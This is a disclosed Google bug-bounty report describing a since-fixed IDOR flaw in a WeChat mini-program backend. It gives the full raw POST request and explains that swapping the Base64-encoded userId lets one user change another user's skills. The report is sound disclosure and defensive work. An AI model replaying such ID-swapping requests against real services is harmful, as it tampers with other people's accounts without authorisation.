Skip to Content (Press Enter)
Google
Bug Hunters
IDOR in primer.googlecnapps.cn leads to change user's skill
Reported by:
akihi
Google VRP
triaged
20:20 | Dec 29, 2021
accepted
19:22 | Dec 31, 2021
fixed
18:39 | Sep 15, 2022
reward decided
$500
Summary:
IDOR in primer.googlecnapps.cn leads to change user's skill
Product:
https://primer.googlecnapps.cn/
URL:
https://primer.googlecnapps.cn/primer/wechat/updateSelectedSkillsAndAuthStutas
Vulnerability type:
Permissions Bypass
Details
IDOR in primer.googlecnapps.cn leads to change user's skills
url:
https://primer.googlecnapps.cn/primer/wechat/updateSelectedSkillsAndAuthStutas
relevant product: 
wechat miniprogram:
谷歌成长指南
after opening the wechat miniprogram:
谷歌成长指南
in wechat,  you can request the package  as follows in manageing skills.
POST /primer/wechat/updateSelectedSkillsAndAuthStutas HTTP/1.1
Host: primer.googlecnapps.cn
Connection: close
Content-Length: 162
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 MicroMessenger/7.0.9.501 NetType/WIFI MiniProgramEnv/Windows WindowsWechat
content-type: application/json
Referer:
https://servicewechat.com/wx7dbcdf859b383726/60/page-frame.html
Accept-Encoding: gzip, deflate
{"userIdEncrypt":"[REDACTED_ID]","userId":[REDACTED_ID],"selectedSkillInfo":[6279416820793344,5412462388051968,5816948650672128],"checkDiffer":true}
The value of userIdEncrypt is the BASE64 encoding of userId. Modifying  others' skill  can be done by changing the value of userIdEncrypt and userId  as others'.
Attack scenario
It is easy to modify the user's skill.And system recommand courses by skills.This will cause bad experience for users.
登录
使用 Google 账号登录